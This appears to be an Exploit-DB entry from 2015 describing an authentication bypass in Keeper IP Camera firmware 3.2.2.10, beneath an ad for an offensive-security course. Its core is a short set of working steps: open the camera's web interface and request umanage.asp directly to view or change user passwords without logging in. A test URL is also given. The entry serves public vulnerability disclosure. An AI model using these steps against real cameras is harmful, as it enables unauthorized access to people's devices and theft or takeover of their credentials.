Keeper IP Camera 3.2.2.10 - Authentication Bypass

EDB-ID:

37965

CVE:





Platform:

Hardware

Date:

2015-08-25


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Keeper IP Camera - Authentication Bypass
# Date: 25/08/2015
# Exploit Author: RAT - ThiefKing
# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
# Version: 3.2.2.10
# WEB Version: 6.1.17.192
# Tested on: QB200W, QB130W, QA130W,...

Exploit:
1 - First, open your browser
2 - Enter the IP address or domain to see the login screen of the camera
3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)

You can change or view passwords

TEST: http://server:88/login.asp
-- 
RAT - ThiefKing
http://tromcap.com